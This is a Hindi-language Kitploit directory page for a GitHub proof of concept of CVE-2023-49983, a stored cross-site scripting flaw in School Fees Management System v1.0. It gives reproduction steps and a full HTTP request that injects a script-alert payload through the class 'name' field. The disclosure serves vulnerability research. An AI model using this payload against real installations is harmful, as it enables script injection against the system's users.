Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49983 — स्कूल फीस प्रबंधन प्रणाली v1.0 - "/management/class" पर "name" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49983
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgeraldoalcantara/cve-2023-49983

CVE-2023-49983

स्कूल फीस प्रबंधन प्रणाली v1.0 - "/management/class" पर "name" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49983

School Fees Management System v1.0 - "/management/class" पर "name" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

विवरण: School Fees Management System v1.0 के "/management/class" घटक में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता, हमलावरों को name पैरामीटर में इंजेक्ट किए गए विशेष रूप से तैयार पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।

संवेदनशील उत्पाद संस्करण: School Fees Management System v1.0
सीवीई लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की तिथि: 19/12/2023
सीवीई: CVE-2023-49983
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

भेद्यता का शोषण करने के लिए, उपयुक्त अनुमतियों वाले उपयोगकर्ता को "/ci_fms/admin/management/class" पृष्ठ तक पहुंचना होगा। इस पृष्ठ पर, उपयोगकर्ता को या तो किसी मौजूदा कक्षा को संपादित करना चाहिए या एक नई कक्षा जोड़नी चाहिए। इस प्रक्रिया के दौरान दुर्भावनापूर्ण पेलोड को "name" पैरामीटर में डाला जाना चाहिए।

अनुरोध:

root@kitploit:~
POST /ci_fms/admin/action/edit_student/1/1 HTTP/1.1
Host: 192.168.68.148
Content-Length: 268
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydFBWs52W42v8XLGe
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/enrollment/class/1
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=c561k45qbrtsb34f2k30f936v0aijl01
Connection: close

------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="name"

<script>alert(document.domain)</script>
------WebKitFormBoundarydFBWs52W42v8XLGe
Content-Disposition: form-data; name="parent"

1
------WebKitFormBoundarydFBWs52W42v8XLGe--

खोजकर्ता/श्रेय:
Geraldo Alcântara

टूल डाउनलोड करें